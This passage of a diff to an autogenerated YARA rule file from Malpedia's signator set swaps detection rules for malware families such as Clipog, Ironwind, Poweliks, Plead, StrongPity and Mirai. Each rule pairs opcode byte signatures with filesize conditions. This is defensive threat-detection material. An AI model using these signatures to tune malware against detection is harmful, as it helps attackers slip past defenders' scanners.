-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hui_loader_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.clipog"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.clipog_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "96ca3a225904ad2e70a598c1b3c7fa88d26822a60a6742e1663517bed35c0526"
+		logic_hash = "5f63443ad5edf1c4dcbd4a8d4fd0cdcfd536873049176b0dcfc08c2019029b24"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113528,32 +113650,32 @@ rule MALPEDIA_Win_Hui_Loader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? 51 8bf8 ffd5 8d9424b8010000 8d842488090000 }
-		$sequence_1 = { ffd0 68e8030000 ffd6 8b0d???????? 51 ff15???????? 5f }
-		$sequence_2 = { 8b1402 3bd3 7406 c70109000000 }
-		$sequence_3 = { 83e01f c1f905 8d04c0 8b0c8d60e20010 8d44810c 50 }
-		$sequence_4 = { 52 50 a3???????? ff15???????? a1???????? }
-		$sequence_5 = { 83c628 83f90a 7cd9 33d2 }
-		$sequence_6 = { 8d4a01 0338 83c004 49 75f8 42 83c628 }
-		$sequence_7 = { c20400 8b15???????? 33c0 68???????? 52 }
-		$sequence_8 = { ff15???????? a3???????? 33ff 8d4c2428 }
-		$sequence_9 = { 7e0f 8b4efc 8b5401fc 031401 8b0e 891401 }
+		$sequence_0 = { 736a 488bfb 4c8d358e520100 83e73f 488bf3 48c1fe06 }
+		$sequence_1 = { b910000000 ff15???????? 488b4b18 6685c0 740c 488d15e2e70100 e9???????? }
+		$sequence_2 = { 488bca 4c8d05359e0100 83e13f 488bc2 48c1f806 }
+		$sequence_3 = { 4881ecd0010000 48c7442438feffffff 48899c2410020000 488b05???????? }
+		$sequence_4 = { 8d0480 03c0 8bcf 2bc8 0f841f050000 8d41ff 8b848288d40100 }
+		$sequence_5 = { 48ffc5 ff15???????? 85c0 747d 83bc249000000000 7473 4c8d155a95feff }
+		$sequence_6 = { 488d158ee80100 e9???????? 488d1592e80100 e9???????? 488d1596e80100 e9???????? }
+		$sequence_7 = { 488b41f8 483bc1 7338 482bc8 4883f908 }
+		$sequence_8 = { 488bea 488bf1 4885d2 7515 4533f6 4c8931 488b6c2478 }
+		$sequence_9 = { 7457 48837b1808 48897310 7243 488b0b eb41 4883ff08 }
 
 	condition:
-		7 of them and filesize < 131072
+		7 of them and filesize < 372736
 }
-rule MALPEDIA_Win_Miuref_Auto : FILE
+rule MALPEDIA_Win_Ironwind_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4c12abfd-56eb-5794-a878-e360bcdd710f"
+		id = "b7b3278a-33a9-59fb-98d9-d012cae38570"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miuref"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.miuref_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironwind"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ironwind_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "5ba2d5449e6730857e7b4a98904adc38cf054939f52a1a5bc78d4b800b88b99f"
+		logic_hash = "df52b853e06a9bac2fed032f09d4a195b27f234efb72e316b71f02accfc6c4ed"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113567,32 +113689,32 @@ rule MALPEDIA_Win_Miuref_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7408 3bf9 7404 3bf8 7510 }
-		$sequence_1 = { ff36 e8???????? 53 8945e0 e8???????? 59 }
-		$sequence_2 = { 895df0 895df4 895de8 e8???????? 59 6a15 83ec10 }
-		$sequence_3 = { 53 ff75f4 e8???????? 59 59 3945f8 0f86e7feffff }
-		$sequence_4 = { 83c40c 68000000f0 6a01 56 8945f4 }
-		$sequence_5 = { 894dd4 8b4804 53 2bca 68???????? 51 52 }
-		$sequence_6 = { a1???????? c780140100006d455c02 a1???????? c78018010000a58f63dc }
-		$sequence_7 = { 5f 53 e8???????? a1???????? 59 5b c9 }
-		$sequence_8 = { 50 56 ff750c 57 ff15???????? 57 ff15???????? }
-		$sequence_9 = { 59 85c0 7512 3bdd 7e03 4b eb03 }
+		$sequence_0 = { 4d3926 7425 4c396718 751f 4c396720 7519 498b8f90110000 }
+		$sequence_1 = { c7459401000000 498b5620 e8???????? 4c8d45b8 488bce 488d15fd5c0300 e8???????? }
+		$sequence_2 = { 498b4c3608 49892c36 ff15???????? 49896c3608 488bb3c80c0000 488bc6 48ffc7 }
+		$sequence_3 = { 0f8582010000 48837f4800 7568 488b6f08 4885ed 744a 48635f10 }
+		$sequence_4 = { 488bce e8???????? b80f000000 e9???????? 4438a7db020000 418bc4 41b801000000 }
+		$sequence_5 = { 488d15613e0500 e8???????? 488bf8 418bde 4885c0 0f84ab050000 440fb6bd08200000 }
+		$sequence_6 = { 488d159df20300 488bcb e8???????? 4885c0 752b 448d4810 488bd6 }
+		$sequence_7 = { 4c8bc0 488d15ad180200 488bcd e8???????? 899d540d0000 c70637000000 48635720 }
+		$sequence_8 = { e9???????? 498b00 4885c0 790a b82b000000 e9???????? 48898120030000 }
+		$sequence_9 = { 410f94c7 4489bde0000000 4d8b4cc1f8 e8???????? 8bf8 85c0 0f85fffeffff }
 
 	condition:
-		7 of them and filesize < 180224
+		7 of them and filesize < 995328
 }
-rule MALPEDIA_Win_Micrass_Auto : FILE
+rule MALPEDIA_Win_Poweliks_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d96a8185-8065-503d-97cd-f54a64309e1a"
+		id = "1e577d24-5a33-56a2-89ea-12d263fea556"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.micrass"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.micrass_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.poweliks_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "faa5276115d7780fcc63dd8ad050c766a7977fec6ea03be4a57f43d14c048567"
+		logic_hash = "25339dff3576021bbd48649b55b3a0a905a70a087edb57140d53477b59a39b79"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113606,32 +113728,32 @@ rule MALPEDIA_Win_Micrass_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83bd20faffff14 7324 8b85f0fcffff 038520faffff }
-		$sequence_1 = { 8bec 837d0800 7e1f 56 b9???????? 8bf2 2bc8 }
-		$sequence_2 = { 0fb6c0 eb12 8b45e0 8a807c194000 08443b1d 0fb64601 }
-		$sequence_3 = { 2b34bda0dd4000 c1fe06 8bc7 c1e005 }
-		$sequence_4 = { 83c40c 8d85e8fbffff 8985f0fcffff 83a520faffff00 }
-		$sequence_5 = { 56 50 e8???????? 8b85e44fffff 83c40c }
-		$sequence_6 = { 6a05 59 be???????? 8dbd0cfdffff }
-		$sequence_7 = { ff15???????? 6804010000 57 53 e8???????? 83c40c }
-		$sequence_8 = { 8945ec 6bc0f8 894df4 2955f4 014508 }
-		$sequence_9 = { 8bcb e8???????? 59 837e4400 57 bf???????? }
+		$sequence_0 = { 7415 8b7d08 8b720c 81c704110000 03f7 8b7a04 03f8 }
+		$sequence_1 = { 8bce 85c9 7415 8b7d08 8b720c 81c704110000 }
+		$sequence_2 = { 81c604110000 6a40 6800300000 03de ff7350 6a00 ffd0 }
+		$sequence_3 = { 3a441dd0 7509 ff45fc 837dfc0d }
+		$sequence_4 = { 7506 40 83f80f 72eb 83f80f 7503 }
+		$sequence_5 = { 0fb74b06 ff45f4 83c228 394df4 72cd }
+		$sequence_6 = { 3bc8 75ce 8b5508 8b423c 8b441078 }
+		$sequence_7 = { 8bcb d2e0 0ad0 88543e01 ff45f8 fe45ff 8b45f8 }
+		$sequence_8 = { 8b45fc c9 c3 55 8d6c2488 81ec9c000000 6898000000 }
+		$sequence_9 = { 8b5df4 03d8 8a4405d0 3a441dd0 7509 }
 
 	condition:
-		7 of them and filesize < 163840
+		7 of them and filesize < 115712
 }
-rule MALPEDIA_Win_Iconic_Stealer_Auto : FILE
+rule MALPEDIA_Win_Iispy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "380edff9-b58c-56a7-886b-9f1f08a2730a"
+		id = "f477a1c5-e3be-5ef8-b32e-8b426be4a34a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.iconic_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.iconic_stealer_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.iispy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.iispy_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "79bfb58f74bc25ff74aa194b90c6f55ae1a1814931feba358207424fda4b9135"
+		logic_hash = "a63d1814fb9729f25b3d33b430e70a4df7089bb73b4fd099189f97e6642fe502"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113645,34 +113767,34 @@ rule MALPEDIA_Win_Iconic_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 85c0 0f840c020000 4084f6 0f847e030000 45386c2467 0f8573030000 }
-		$sequence_1 = { f20f590d???????? f20f580d???????? f20f580d???????? 897728 33f6 f2480f2cc1 488907 }
-		$sequence_2 = { ffca 490faf92c8000000 4c8b09 41ff9190000000 eb08 498bcb e8???????? }
-		$sequence_3 = { e8???????? 89442448 eb2e 488d0c52 8d4201 898390000000 488b8388000000 }
-		$sequence_4 = { e8???????? 498b0c24 488d542430 41b101 41c744242401000000 49c7c0ffffffff 48c7442420ffffffff }
-		$sequence_5 = { 7416 41b101 4c897c2420 448bc5 418bd4 488bcf e8???????? }
-		$sequence_6 = { f6c224 7405 488b31 eb2b f6c208 740e f20f1001 }
-		$sequence_7 = { ffc3 4903ee 413bdf 0f8e5dffffff 488b5c2448 4885db 0f8495000000 }
-		$sequence_8 = { eb1e 486306 8d4801 394e04 0f8d94000000 488b4d00 4d8bc6 }
-		$sequence_9 = { 7d0f 488b4208 488d0c49 0fb654c80c eb02 b244 0fbeda }
+		$sequence_0 = { eb05 8b0e 8b7608 51 ff75ec 51 56 }
+		$sequence_1 = { 894c2408 83f80a 7d10 6a0a 8bce e8???????? 8b4e0c }
+		$sequence_2 = { 6808020000 ff5048 8bd8 33f6 85db 7517 }
+		$sequence_3 = { 8b4c2410 8944240c 8b442414 25ffffff7f 89542408 0bc8 }
+		$sequence_4 = { 0fb60455c1820210 8803 43 eb05 80c230 }
+		$sequence_5 = { e8???????? 8b4f0c 8d0431 89470c 85c9 7465 6a00 }
+		$sequence_6 = { 55 8bec 8b4508 53 57 8d1c8500d30210 }
+		$sequence_7 = { 85c0 8b45b8 7424 8b55e0 b9???????? 81c208020000 0f45ca }
+		$sequence_8 = { 894c2414 3ad0 7610 49 894c2414 381431 757f }
+		$sequence_9 = { 743a 56 ff75c4 8d4dc8 e8???????? 8b7de0 85ff }
 
 	condition:
-		7 of them and filesize < 2401280
+		7 of them and filesize < 397312
 }
-rule MALPEDIA_Elf_Mirai_Auto : FILE
+rule MALPEDIA_Win_Dizzyvoid_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "49bbb193-8df3-5413-98b4-2dd8215ff30b"
+		id = "b900bbf0-efba-5979-b901-058422cfe398"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/elf.mirai_auto.yar#L1-L108"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dizzyvoid"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dizzyvoid_auto.yar#L1-L226"
 		license_url = "N/A"
-		logic_hash = "73e144a4e19cc6b3055073cf3ad82cd5b793db0175f18a71bb7c0cd3632a6c7c"
+		logic_hash = "8385659a773378b82a70cc8941b67dcf8ffad28a19525f1f78e990eee9f0fdc1"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -113684,34 +113806,48 @@ rule MALPEDIA_Elf_Mirai_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? e8???????? 66894314 e9???????? }
-		$sequence_1 = { 89d0 c1e005 01d0 89ca }
-		$sequence_2 = { c1ea03 89d0 c1e005 01d0 89ca 29c2 }
-		$sequence_3 = { 89d0 c1e005 01d0 89ca 29c2 }
-		$sequence_4 = { c1ea02 8d1492 29d0 83f804 }
-		$sequence_5 = { c7433400000000 894330 c6433801 c6433903 }
-		$sequence_6 = { 894330 c6433801 c6433903 c6433a03 c6433b06 }
-		$sequence_7 = { e8???????? c7433400000000 894330 c6433801 }
-		$sequence_8 = { e9???????? e8???????? 66894304 e9???????? }
-		$sequence_9 = { 66c1e808 d0e8 8d04c0 28c2 }
+		$sequence_0 = { 488d4590 4533c0 4889442440 33d2 }
+		$sequence_1 = { 4903d1 48c1fa07 488bc2 48c1e83f }
+		$sequence_2 = { 48895c2420 4883ceff 448bce 33d2 }
+		$sequence_3 = { 498bc8 48c1e902 418bc1 48c1e802 }
+		$sequence_4 = { 4889442428 c7442420c0040000 4c8d8de0000000 41b808000000 }
+		$sequence_5 = { 488bcb c744242004000000 41b806100000 488be8 ff5758 }
+		$sequence_6 = { 44897c2428 48896c2420 448bce 4d8bc6 }
+		$sequence_7 = { 448bc6 33d2 b92b040000 ff9358010000 }
+		$sequence_8 = { 85c0 7524 a1???????? a3???????? a1???????? c705????????2a134100 }
+		$sequence_9 = { 8d85a8fcffff 50 8b8d90fcffff 51 e8???????? 83c40c }
+		$sequence_10 = { 83c40c 8bf4 ff9590fcffff 3bf4 }
+		$sequence_11 = { 8b4dfc 33cd e8???????? 81c434040000 3bec e8???????? 8be5 }
+		$sequence_12 = { ff9590fcffff 3bf4 e8???????? 33c0 52 8bcd 50 }
+		$sequence_13 = { 56 57 8dbdccfbffff b90d010000 }
+		$sequence_14 = { a1???????? 33c5 8945fc b9d3000000 be???????? 8dbda8fcffff }
+		$sequence_15 = { b90d010000 b8cccccccc f3ab a1???????? 33c5 }
+		$sequence_16 = { eb36 8b852ce5ffff 8b8d1ce5ffff 8b0485601c4100 }
+		$sequence_17 = { 6a00 50 6a00 6a00 ff15???????? 6aff 50 }
+		$sequence_18 = { c780acff400002000000 6a04 58 6bc000 8b0d???????? }
+		$sequence_19 = { 57 a1???????? 33c4 50 8d842478010000 64a300000000 6800100000 }
+		$sequence_20 = { 8365fc00 833cfd40f2400000 7515 68a00f0000 56 }
+		$sequence_21 = { e9???????? 8365c800 c745cc8d314000 a1???????? }
+		$sequence_22 = { 8d85f0ebffff 03c1 8b8d1ce5ffff 50 8b852ce5ffff 8b0485601c4100 }
+		$sequence_23 = { 47 88440e34 8b049d601c4100 c744063801000000 }
 
 	condition:
-		7 of them and filesize < 2228224
+		7 of them and filesize < 479232
 }
-rule MALPEDIA_Win_Nightdoor_Auto : FILE
+rule MALPEDIA_Win_Plead_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d930ef7f-f999-550e-bc75-97e1e8c7627b"
+		id = "6ebeecb3-22ba-51cf-8f7b-acfcb3488d30"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nightdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nightdoor_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.plead"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.plead_auto.yar#L1-L236"
 		license_url = "N/A"
-		logic_hash = "b8f0be07bb7b1289cbb83b32643a32575a68c3484dc281ff533188505409d208"
+		logic_hash = "3927d6d1b5e82a17fd417b0071c76ba719237a780a5f2d36d13d9a1ea487844d"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -113723,32 +113859,46 @@ rule MALPEDIA_Win_Nightdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bec 57 8b7d08 85ff 7423 8b4774 c6476001 }
-		$sequence_1 = { c745fc00000000 8b45e4 c70000040000 8b4de4 8b11 52 e8???????? }
-		$sequence_2 = { c7430404000000 8b7068 6a08 e8???????? 8bf8 83c40c 85ff }
-		$sequence_3 = { 50 8d45f4 64a300000000 8bf9 8bce 897db4 c745b000000000 }
-		$sequence_4 = { 8d7708 53 8d85e0feffff 897704 e8???????? 8bd8 83c410 }
-		$sequence_5 = { 8d460c 8d4ff4 8945fc 83c40c 33c0 85c9 742b }
-		$sequence_6 = { c645fc01 33db e8???????? 85c0 7468 68???????? 57 }
-		$sequence_7 = { 8b8538feffff 50 e8???????? 59 c3 8d4dc0 }
-		$sequence_8 = { 52 8b55ec 52 50 e8???????? 8b7e04 8b0e }
-		$sequence_9 = { 8d55b8 52 e8???????? 898538ffffff 8b8d3cffffff e8???????? 8d8d4cffffff }
+		$sequence_0 = { 50 6a01 ff15???????? 83c40c 85c0 7504 33c0 }
+		$sequence_1 = { 83c40c 8d4514 53 50 56 }
+		$sequence_2 = { ff15???????? 85c0 750c c745fcfbffffff }
+		$sequence_3 = { 85c0 7504 33c0 eb09 56 50 }
+		$sequence_4 = { ebda 33f6 c745fcf8ffffff 3bf7 750c 895dfc }
+		$sequence_5 = { 59 894510 0f878f000000 3bc3 0f8482000000 }
+		$sequence_6 = { 85c0 750f 56 ff15???????? 6afe 58 e9???????? }
+		$sequence_7 = { e8???????? 817d14e8030000 53 56 }
+		$sequence_8 = { 81ec1c020000 53 56 57 8965f0 ff15???????? 8bd8 }
+		$sequence_9 = { 8a10 03f2 40 49 8975fc 75ec 8bc6 }
+		$sequence_10 = { 50 f3ab c705????????01000000 ff15???????? 8b1d???????? ffd3 8bf8 }
+		$sequence_11 = { 8b942428020000 8b842424020000 52 50 51 8b8c2428020000 }
+		$sequence_12 = { 5d 8a44341c 32c2 8844341c 46 3bf1 }
+		$sequence_13 = { 52 ff15???????? 6aff a1???????? }
+		$sequence_14 = { 8b8c241c020000 68???????? 51 ff15???????? 33c0 81c418020000 c21000 }
+		$sequence_15 = { 8d7c241c 6804010000 52 50 }
+		$sequence_16 = { 648b1530000000 8b520c 8b521c 8b5a08 }
+		$sequence_17 = { 833f00 7420 85db 7505 bb50000000 }
+		$sequence_18 = { 6a04 6800200000 ff7750 50 ff5644 }
+		$sequence_19 = { 51 035b3c 894334 e8???????? 8b45f8 }
+		$sequence_20 = { 89048a 8945ec 8b567c 895004 c7467c00000000 }
+		$sequence_21 = { e8???????? b02c aa 8b4510 85c0 }
+		$sequence_22 = { 85c0 0f849f020000 8945f0 6a0c 8d4de0 }
+		$sequence_23 = { 6a00 ff75f8 ff5648 eb0d }
 
 	condition:
-		7 of them and filesize < 1124352
+		7 of them and filesize < 8224768
 }
-rule MALPEDIA_Win_Rarstar_Auto : FILE
+rule MALPEDIA_Win_Sslmm_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "18a386a5-5130-5703-978a-5323644a8d5c"
+		id = "4fb6315d-623b-56fe-a1a9-1366cd8ee4e8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rarstar_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sslmm_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "731c9230a2c0993fe7a5be5efd272fc408168bba25b13288ff7847590ce53fc3"
+		logic_hash = "e05d1383c6fd4195ee348036204c560e38cfb3624a913866f02778d6ae43e5d9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113762,34 +113912,34 @@ rule MALPEDIA_Win_Rarstar_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8dbc2424020000 f3ab bf???????? 83c9ff }
-		$sequence_1 = { f2ae f7d1 49 8d44240c 2bca 51 50 }
-		$sequence_2 = { 50 ffd5 85c0 0f8445010000 8b442420 85c0 742f }
-		$sequence_3 = { 8bc6 5e c20400 81ec24030000 53 }
-		$sequence_4 = { 33db 8a940c24010000 8a5c0c24 03c2 03c3 25ff000080 }
-		$sequence_5 = { 33db 8a940c20010000 8a5c0c20 03c2 03c3 25ff000080 7907 }
-		$sequence_6 = { 7605 2bc1 83c003 8d14c500000000 b8abaaaaaa }
-		$sequence_7 = { f3ab bf???????? 83c9ff 33db 8d942424020000 f2ae f7d1 }
-		$sequence_8 = { 33db 8a940c24010000 8a5c0c24 03c2 03c3 }
-		$sequence_9 = { 52 50 68???????? 57 895c241c c744243802000000 }
+		$sequence_0 = { ff9630010000 897c2428 81fb18030980 0f8493feffff }
+		$sequence_1 = { 0f8447010000 03f8 eb08 c744241801000000 8d542464 }
+		$sequence_2 = { 33db 57 8b85ac000000 53 }
+		$sequence_3 = { 56 8bc1 8bf7 8b7c2410 c1e902 f3a5 }
+		$sequence_4 = { ff930c010000 8be8 89742414 3bee 7415 81fd12030900 }
+		$sequence_5 = { 8d4e0c 53 51 89869c000000 e8???????? 8b9790000000 83c408 }
+		$sequence_6 = { 50 8bcf e8???????? c7442410ffffffff eb1f }
+		$sequence_7 = { 53 6a00 6a00 e8???????? 8b96a0000000 83c420 8d4c240c }
+		$sequence_8 = { f2ae f7d1 49 85c9 7e3a }
+		$sequence_9 = { ff15???????? 6a00 6a00 8d542418 6a00 }
 
 	condition:
-		7 of them and filesize < 122880
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Campoloader_Auto : FILE
+rule MALPEDIA_Win_Strongpity_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "00b62c88-0d38-56b9-90a5-7c85290ffbe9"
+		id = "9dea39af-3982-5a58-a948-3e1c67dd03f0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.campoloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.campoloader_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.strongpity_auto.yar#L1-L178"
 		license_url = "N/A"
-		logic_hash = "dae472a7090c99e8a9ce136356f9bc867c42c508ecb59c9f6aa0187832a15e3c"
-		score = 75
-		quality = 75
+		logic_hash = "8a0d5e9b999ff0f85c5dc06bfd5cfa7c4f64f5270847839a9eee14c1a7cc3626"
+		score = 60
+		quality = 45
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -113801,34 +113951,40 @@ rule MALPEDIA_Win_Campoloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83ec1c a1???????? 33c5 8945fc a1???????? 8945e4 }
-		$sequence_1 = { 898d58efffff c78584efffff00000000 8d55f4 52 8b8558efffff 50 }
-		$sequence_2 = { ff15???????? ff15???????? 8b8584efffff 8b4dfc 33cd e8???????? }
-		$sequence_3 = { 8b9584efffff 039574efffff c60200 8b450c }
-		$sequence_4 = { ff15???????? 898550efffff 0fb78554efffff 50 }
-		$sequence_5 = { 038d8cefffff 898d74efffff e9???????? 8b9584efffff 039574efffff c60200 8b450c }
-		$sequence_6 = { ff15???????? 8945f8 68???????? 8b45fc 50 }
-		$sequence_7 = { 6a01 6a00 6a00 6800000040 8b4510 }
-		$sequence_8 = { 8b8558efffff 50 8d8df0feffff 51 }
-		$sequence_9 = { 8b8d70efffff 51 8b9584efffff 52 ff15???????? }
+		$sequence_0 = { 6aff ff771c 56 ff15???????? 837df800 7416 6a04 }
+		$sequence_1 = { 53 56 ff15???????? 85c0 7427 53 }
+		$sequence_2 = { eb0f 50 56 e8???????? 59 59 }
+		$sequence_3 = { 75f8 ff75d0 68???????? ff36 e8???????? 8b45d4 }
+		$sequence_4 = { 6a6f 668945d4 58 6a6e 5a 6a74 }
+		$sequence_5 = { 7417 ba00010000 8bc8 c60100 41 83ea01 75f7 }
+		$sequence_6 = { ff75f4 68???????? 8d0441 50 e8???????? 8b4608 83c418 }
+		$sequence_7 = { 6a02 59 03c1 50 e8???????? }
+		$sequence_8 = { 5e 5d 83c40c c3 396f18 }
+		$sequence_9 = { 5e 5d 5b c3 837c240800 56 }
+		$sequence_10 = { 5e 5d 83c408 c3 33db }
+		$sequence_11 = { 5e 5d 5b 83c420 c3 8b442424 68???????? }
+		$sequence_12 = { 5e 5d 5b 83c410 c3 837c242c00 }
+		$sequence_13 = { 5e 5d 8919 33c0 5b 59 }
+		$sequence_14 = { 57 8b38 8b8f30870000 8baf28010000 }
+		$sequence_15 = { 5e 5d 8bc3 5b 83c410 c3 8b464c }
 
 	condition:
-		7 of them and filesize < 66560
+		7 of them and filesize < 999424
 }
-rule MALPEDIA_Win_Vobfus_Auto : FILE
+rule MALPEDIA_Win_Leash_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0a46ea97-451e-5b39-90ae-66d0e7a88052"
+		id = "0278e751-33b7-524f-8591-2e0be840b450"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vobfus_auto.yar#L1-L223"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.leash"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.leash_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "cd307f59d811d28b88e7eec0e8a6b94fb0cf2bc6703d3faae8f6ec5a004bc423"
+		logic_hash = "ed40f6249299f75f35aea5ea7ac83b742dd2beb0bf7f39fe8ae59cad9cdb437c"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -113840,48 +113996,34 @@ rule MALPEDIA_Win_Vobfus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b5508 8b92e8000000 8b8230200000 50 }
-		$sequence_1 = { 8b5508 8b92e8000000 8b82140c0000 50 }
-		$sequence_2 = { 8b5508 8b92e8000000 8b8228070000 50 }
-		$sequence_3 = { 8b5508 8b92e8000000 8b82080f0000 50 }
-		$sequence_4 = { 8bec 8b5508 8b92e8000000 8b82c0170000 50 50 }
-		$sequence_5 = { 55 8bec 8b5508 8b92e8000000 8b82f81b0000 50 }
-		$sequence_6 = { 8b82381e0000 50 50 8b10 ff5204 58 }
-		$sequence_7 = { 8b5508 8b92e8000000 8b825c030000 50 }
-		$sequence_8 = { 00e0 c9 8f00 e3ce 97 00e6 d39500e4d19b }
-		$sequence_9 = { f2ed ec f2ed ec f3ed }
-		$sequence_10 = { c19400d6c49500d7 c59900dac999 00e0 c9 }
-		$sequence_11 = { 801800 0808 0006 3401 }
-		$sequence_12 = { 73f3 aa 5c f6ac4ff8b54ffb }
-		$sequence_13 = { 0006 3401 41 06 1005???????? 0100 }
-		$sequence_14 = { 5c f6ac4ff8b54ffb c058fcca 61 }
-		$sequence_15 = { 1400 48 0008 78ff 0d50004900 3e3cff }
-		$sequence_16 = { a1???????? 00ec dea600e0d4b3 00e0 d4b4 }
-		$sequence_17 = { 41 06 1001 ff06 }
